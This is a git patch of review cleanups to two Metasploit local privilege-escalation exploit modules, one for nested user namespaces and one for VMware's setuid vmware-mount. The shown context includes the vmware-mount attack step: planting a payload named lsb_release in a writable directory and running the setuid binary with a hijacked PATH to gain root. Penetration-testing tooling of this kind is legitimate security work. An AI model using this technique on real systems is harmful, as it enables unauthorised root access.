From a3eee73efb45b162deb5d3dae7287cdfe718c60f Mon Sep 17 00:00:00 2001 From: h00die Date: Sat, 8 Oct 2022 09:16:57 -0400 Subject: [PATCH] review comments --- .../local/nested_namespace_idmap_limit_priv_esc.rb | 2 +- modules/exploits/linux/local/vmware_mount.rb | 11 +++++------ 2 files changed, 6 insertions(+), 7 deletions(-) diff --git a/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb b/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb index ad2aa70d40..794a37d273 100644 --- a/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb +++ b/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb @@ -124,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Local end register_file_for_cleanup path - chmod path, 0o755 + chmod path, 0755 end def strip_comments(c_code) diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb index 36ec7a3292..f12cc621a7 100644 --- a/modules/exploits/linux/local/vmware_mount.rb +++ b/modules/exploits/linux/local/vmware_mount.rb @@ -63,8 +63,11 @@ class MetasploitModule < Msf::Exploit::Local ] end + def vmware_mount + '/usr/bin/vmware-mount' + end + def check - vmware_mount = '/usr/bin/vmware-mount' return CheckCode::Safe("#{vmware_mount} file not found") unless file? vmware_mount return CheckCode::Safe("#{vmware_mount} is not setuid") unless setuid? vmware_mount @@ -79,13 +82,9 @@ class MetasploitModule < Msf::Exploit::Local lsb_path = File.join(datastore['WritableDir'], 'lsb_release') write_file(lsb_path, generate_payload_exe) cmd_exec("chmod +x #{lsb_path}") - cmd_exec("PATH=#{datastore['WritableDir']}:$PATH /usr/bin/vmware-mount") + cmd_exec("PATH=#{datastore['WritableDir']}:$PATH #{vmware_mount}") # Delete it here instead of using FileDropper because the original # session can clean it up cmd_exec("rm -f #{lsb_path}") end - - def setuid?(remote_file) - !!(cmd_exec("test -u #{remote_file.strip} && echo true").index 'true') - end end